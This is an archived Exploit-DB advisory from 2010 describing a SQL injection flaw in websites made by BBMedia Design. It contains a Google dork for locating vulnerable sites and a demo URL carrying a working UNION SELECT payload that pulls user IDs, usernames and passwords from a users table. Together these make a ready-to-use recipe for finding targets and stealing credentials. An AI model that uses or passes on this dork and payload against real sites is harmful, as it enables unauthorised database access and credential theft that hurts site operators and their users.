BBMedia Design's SQL Injection Vulnerability



EDB-ID: 12711 CVE: N/AOSVDB-ID: N/A
Author: XroGuEPublished: 2010-05-23Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
=========================================================
BBMedia Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: BBMedia Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://www.bbmedia.org
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################
[+] Dork: intext:"Design by BB Media.Org"
[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]
[+] Demo: http://server/prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users
##########################################






Comments

No comments so far